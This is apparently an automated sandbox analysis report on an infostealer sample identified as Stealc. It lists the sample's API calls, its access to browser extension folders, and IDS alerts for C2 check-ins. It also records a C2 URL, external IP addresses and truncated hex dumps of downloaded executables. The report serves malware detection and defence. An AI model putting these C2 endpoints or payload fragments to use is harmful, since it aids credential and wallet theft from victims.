                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007071000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2242409589.00000000004EC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000000.2235272008.00000000004EC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000006.00000000.2240945975.000000000110C000.00000002.00000001.01000000.00000010.sdmp, UniversalInstaller.exe, 00000006.00000002.2307212182.000000000110C000.00000002.00000001.01000000.00000010.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: y:C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: 4BfhCycV4B.exe, 00000000.00000003.2057767194.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000000.2055726673.000000000040F000.00000002.00000001.01000000.00000005.sdmp
                            Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000006EE0000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3303653067.0000013E35A20000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000006BD2000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2245242883.000000006C267000.00000002.00000001.01000000.0000000F.sdmp, UniversalInstaller.exe, 00000006.00000002.2309485282.000000006C267000.00000002.00000001.01000000.00000011.sdmp
                            Source: Binary string: C:\yokirew38_tidamikip hopoyura.pdb source: 4BfhCycV4B.exe, 00000000.00000000.2014790341.000000000040F000.00000002.00000001.01000000.00000003.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2264464647.0000000004330000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: 4BfhCycV4B.exe, 00000000.00000003.2057767194.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000000.2055726673.000000000040F000.00000002.00000001.01000000.00000005.sdmp
                            Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: nss3.pdb source: u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3303896392.0000013E35A30000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: 0C:\yokirew38_tidamikip hopoyura.pdb source: 4BfhCycV4B.exe, 00000000.00000000.2014790341.000000000040F000.00000002.00000001.01000000.00000003.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2264464647.0000000004330000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0041D9E1 FindFirstFileExA,0_2_0041D9E1
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0421DC48 FindFirstFileExA,0_2_0421DC48
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00412570
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040D1C0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004015C0 LocalAlloc,FindFirstFileA,StrCmpCA,StrCmpCA,SetThreadLocale,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_004015C0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_00411650
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B610
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040DB60
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00411B80
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040D540
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,2_2_004121F0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                            Networking

                            barindex
                            Snort IDS alert for network traffic
                            Source: TrafficSnort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.5:49705 -> 185.172.128.90:80
                            Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49708 -> 185.172.128.76:80
                            Source: TrafficSnort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49708 -> 185.172.128.76:80
                            Source: TrafficSnort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.76:80 -> 192.168.2.5:49708
                            Source: TrafficSnort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49708 -> 185.172.128.76:80
                            Source: TrafficSnort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.76:80 -> 192.168.2.5:49708
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: http://185.172.128.76/3cd2b41cbde8fc9c.php
                            Source: Malware configuration extractorURLs: http://185.172.128.76/3cd2b41cbde8fc9c.php
                            Connects to many ports of the same IP (likely port scanning)
                            Source: global trafficTCP traffic: 91.215.85.66 ports 9000,1,4,5,6,7,15647
                            Yara detected Generic Downloader
                            Source: Yara matchFile source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e4ff10000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3514d525.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e35198739.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3517432f.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: global trafficTCP traffic: 192.168.2.5:49738 -> 91.215.85.66:15647
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 07:27:58 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 23 Apr 2024 07:15:01 GMTETag: "52200-616be4ffa1b6b"Accept-Ranges: bytesContent-Length: 336384Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 05 86 02 15 41 e7 6c 46 41 e7 6c 46 41 e7 6c 46 4c b5 b3 46 59 e7 6c 46 4c b5 8c 46 39 e7 6c 46 4c b5 8d 46 6d e7 6c 46 48 9f ff 46 46 e7 6c 46 41 e7 6d 46 2f e7 6c 46 f4 79 89 46 40 e7 6c 46 4c b5 b7 46 40 e7 6c 46 f4 79 b2 46 40 e7 6c 46 52 69 63 68 41 e7 6c 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 82 38 12 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 de 00 00 00 66 c3 03 00 00 00 00 45 39 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 c4 03 00 04 00 00 b8 67 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 51 01 00 50 00 00 00 00 30 c2 03 d0 1d 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 47 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e3 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 20 6b 00 00 00 f0 00 00 00 6c 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 c6 c0 03 00 60 01 00 00 b6 01 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 1d 02 00 00 30 c2 03 00 1e 02 00 00 04 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 23 Apr 2024 07:13:06 GMTContent-Type: application/octet-streamContent-Length: 8538160Last-Modified: Mon, 22 Apr 2024 21:57:43 GMTConnection: keep-aliveETag: "6626dd57-824830"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 41 fc f8 63 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 cc 0d 00 00 28 74 00 00 00 00 00 e8 e4 0d 00 00 10 00 00 00 f0 0d 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 82 00 00 04 00 00 29 e5 82 00 02 00 40 01 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 28 34 00 00 00 30 10 00 a4 8a 72 00 00 00 00 00 00 00 00 00 00 f8 81 00 30 50 00 00 00 f0 0e 00 78 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 89 0e 00 10 08 00 00 00 c0 0e 00 f6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 b2 0d 00 00 10 00 00 00 b4 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 54 16 00 00 00 d0 0d 00 00 18 00 00 00 b8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 2c 27 00 00 00 f0 0d 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 20 53 00 00 00 20 0e 00 00 00 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 28 34 00 00 00 80 0e 00 00 36 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 f6 03 00 00 00 c0 0e 00 00 04 00 00 00 2e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 3c 00 00 00 00 d0 0e 00 00 00 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 e0 0e 00 00 02 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 36 01 00 00 f0 0e 00 00 38 01 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 a4 8a 72 00 00 30 10 00 00 8c 72 00 00 6c 0f 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:28:02 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:28:07 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:28:09 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 